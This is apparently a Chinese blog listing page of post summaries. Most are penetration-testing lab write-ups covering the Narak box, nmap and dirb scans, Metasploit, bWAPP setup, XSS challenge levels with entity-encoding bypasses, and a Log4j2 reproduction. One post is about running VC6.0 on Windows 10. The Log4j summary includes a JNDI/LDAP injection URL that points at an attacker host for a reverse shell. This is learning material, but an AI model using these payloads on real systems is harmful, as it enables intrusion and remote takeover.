摘要:
上机实验要求用到VC++,为了写作业方便,在自己电脑下载了一个。VC6.0能够在XP下很好的运行,不需要额外的配置,但是在win10、win8下需要修改兼容性。 下载完成后鼠标右击桌面图标,选择“属性”: 修改兼容性: 阅读全文
摘要:
(1)查看攻击机ip,nmap扫描相应网段 (2)没扫出来什么,加参数继续扫, ,-A 扫描的常规端口(1000以内); -p 扫描全端口,-sV 扫描端口对应的服务,-O 扫描靶机的系统版本, 【80端口映射到1898端口,访问1898】 (3)访问一下1898端口, (4)dirb扫描http: 阅读全文
摘要:
做narak靶场的时候遇到下面问题:WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!ssh连接报错,解决办法:原因:可能是因为上一层连接是没连接上,就把kali关闭了,然后靶机出现了一个know_hosts.old文件,如果要再次连接,需要删除这文件参 阅读全文
摘要:
需要拿到两个flag(user.txt 和 root.txt)(1)net模式下启动narak靶场:(2)开启kali,查看ip地址,nmap扫描到一个地址:(3)访问扫描到的128地址,查看网页源代码:没有发现什么有用的。(3)dirb扫描,访问http://192.168.88.128/webd 阅读全文
摘要:
(1)查看本机ip,nmap扫描(2)工具Metasplotit(2)search命令+上面扫描到的版本号,发现有可用的exploit(3)use命令(4)show options 查看参数,设置好参数后,再设置一下payload,然后run(5)获取到root权限,攻击完成。 阅读全文
摘要:
【1】漏洞原理:Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议 即可)【2】复现:(1)启动靶场环境:(2)反弹shell:http://靶机ip:8983/solr/admin/cores?action=${jndi:ldap://攻击机ip:1389/Ba 阅读全文
摘要:
(1)docker search bwapp,(2)docker pull 镜像名称,(3)启动容器,(4)浏览器中访问http://本机ip:端口/login.php:会出现提示:(5)访问http://本机ip:端口/install.php做数据库初始化操作,(6)重新登录, 阅读全文
摘要:
docker-compose up 拉取环境出现如下报错,看到Timeout以为是网络不好,其实不然,用vim /etc/docker/daemon.json添加新的镜像地址, 再次docker-compose的时候就顺利进行了。 阅读全文
摘要:
Level8:尝试利用编码绕过,代码转换机制将script中的ri变成了r_i,所只编码r和i试试(html实体编码和hex编码都可以绕过):字母十进制十六进制(hex)rrriiiscript的实体编码:scri&#x 阅读全文
摘要:
Level1:(1)(2)(3)Level2:(1)(2)通过点击 “ 搜索 ” 按钮,将输入框内的内容以 get 方式提交给 服务器上的 level2.php ;经过服务器的动态处理之后又会将参数 keyword 的值插入到 <h2> </h2> 标签之中以及 添加到 <input> 标签中的 v 阅读全文
